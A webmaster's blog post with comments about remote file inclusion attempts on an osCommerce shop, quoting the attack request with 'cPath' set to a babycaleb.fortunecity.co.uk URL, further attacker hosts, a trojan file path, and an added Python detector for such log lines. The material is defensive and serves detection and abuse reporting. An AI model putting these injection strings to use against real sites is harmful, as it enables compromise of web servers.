I am getting a lot of these requests lately:
/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm
They are from lots of IPs, all trying to remote load this page. Inside that page is a hack attempt. AVG gives an alarm if you try to view the source.
Do not go to the website babycaleb.fortunecity.co.uk. AVG detects a virus but it still gets into your system. Look for ..
c:\windows\system32\tools\regexe.exe
a trojan horse downloader.generic8.cox
--updated-
The site has now been shutdown.
A search of Google
http://www.google.com/search?q=babycaleb.fortunecity.co.uk shows that sites all over the net are infected with this attack and they are allowing the attack to spread. Perhaps they are involved in the attack?
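A way to spot this pattern in a web server access log, as an added example that is not part of the original post: it flags any request where a query-string value is itself an absolute URL (as with the `cPath=http://...` request above) and counts requests and distinct client IPs per remote host. The log lines are constructed samples in combined log format using documentation IP addresses, and the function names are illustrative.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined log format: client IP ... [timestamp] "METHOD target PROTO" ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+)[^"]*"')
# A parameter value that is itself an absolute URL is the pattern in the post.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://([^/?#\s:]+)', re.I)

def remote_include_params(request_target):
    """Return [(param, remote_host)] for query values that are absolute URLs."""
    hits = []
    for name, value in parse_qsl(urlsplit(request_target).query,
                                 keep_blank_values=True):
        # parse_qsl decodes once; unquote again to catch double-encoded values.
        m = REMOTE_RE.match(unquote(value).strip())
        if m:
            hits.append((name, m.group(1).lower()))
    return hits

def summarize(log_lines):
    """Map remote host -> {'requests': n, 'clients': set of source IPs}."""
    report = defaultdict(lambda: {"requests": 0, "clients": set()})
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, target = m.groups()
        for _param, host in remote_include_params(target):
            report[host]["requests"] += 1
            report[host]["clients"].add(client)
    return dict(report)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Mar/2010:08:53:01 +0000] "GET /shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm HTTP/1.1" 200 512',
    '198.51.100.7 - - [25/Mar/2010:08:53:09 +0000] "GET /shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm HTTP/1.1" 200 512',
    '203.0.113.5 - - [25/Mar/2010:08:54:30 +0000] "GET /shop/catalog/product_info.php?cPath=http%3A%2F%2Fmyfamily.yoll.net%2Findex.htm HTTP/1.1" 200 512',
    '192.0.2.44 - - [25/Mar/2010:08:55:00 +0000] "GET /shop/catalog/product_info.php?cPath=21_35&products_id=12 HTTP/1.1" 200 9123',
]

if __name__ == "__main__":
    for host, info in sorted(summarize(SAMPLE_LOG).items()):
        print(host, info["requests"], sorted(info["clients"]))
```
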
9 comments:
I am admin for cooking.com. We have been under attack with this babycaleb.fortunecity.co.uk for three days now. Wish Fortunecity would get off their asses and kill it.
I have had around three dozen hacking attempts per week from babycaleb since he set up on fortunecity.
FortuneCity support will not take action.
This is the third hosting company he has worked through (since I have been aware of him). The first two companies actually shut him down. FortuneCity seems unwilling to help.
As webmaster of several websites, I've noticed attack attempts from many babycaleb websites, their number's increasing with time.
Amongst them I've recently noticed:
http://babycaleb.fortunecity.co.uk (even today)
http://calebsbirth.fortunecity.co.uk/
http://babycaleb.mvhosted.com
http://mybabycaleb.chat.ru
What a plea !
It was active on Nov 23
I can show at least 65 examples of times this URL hack has been passed to my website(s).
There are many more.... even with no "babycaleb" in the querystring but on the page, for example:
http://myfamily.yoll.net/index.htm
It is very annoying!
Parsing input: http://myfamily.yoll.net/index.htm
Host myfamily.yoll.net (checking ip) = 216.65.1.200
host 216.65.1.200 (getting name) = fateback.com.
Routing details for 216.65.1.200
Report routing for 216.65.1.200: abuse@dedicatedhosting.com, abuse@interland.com
What I can't understand is why this hacker can't show some nice ladies instead of his ugly bad looking gal :p
Not sure whether it's the same but I have a search cloud on my site that has picked up this fortune city query and another fairly soon after with similar intent.
http://beerincooler.chat.ru/image.jpg
IP:58.0.158.143
SYSTEM: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Date,Time: Thu 25th Mar,2010 08:53 am
until Thu 25th Mar,2010 08:57 am 30 times.